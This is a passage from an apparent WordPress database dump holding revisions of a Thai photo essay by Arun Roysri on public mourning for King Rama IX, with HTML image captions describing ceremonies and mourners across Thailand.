center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:35:31', '2018-11-12 07:35:31', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4393, 3, '2018-11-12 14:37:09', '2018-11-12 07:37:09', '<h3 style=\"text-align: right;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large alignright\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้น</h3>\r\n<h3 style=\"text-align: center;\">ปี และถวายความอาลัยแด่</h3>\r\n<h3></h3>\r\n<h3 style=\"text-align: center;\">ในหลวงรัชกาลที่ 9</h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"text-align: left;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large alignleft\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n \r\n<h3 style=\"text-align: right;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large alignright\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"text-align: left;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<h3 style=\"text-align: center;\"><img class=\"wp-image-4316 size-large alignleft\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"text-align: right;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"wp-image-4317 size-large alignright\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</h3>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:37:09', '2018-11-12 07:37:09', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4394, 3, '2018-11-12 14:39:16', '2018-11-12 07:39:16', '<h3 style=\"text-align: right;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large alignright\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"text-align: left;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large alignleft\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n \r\n<h3 style=\"text-align: right;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large alignright\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"text-align: left;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<h3 style=\"text-align: center;\"><img class=\"wp-image-4316 size-large alignleft\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"text-align: right;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"wp-image-4317 size-large alignright\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</h3>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช 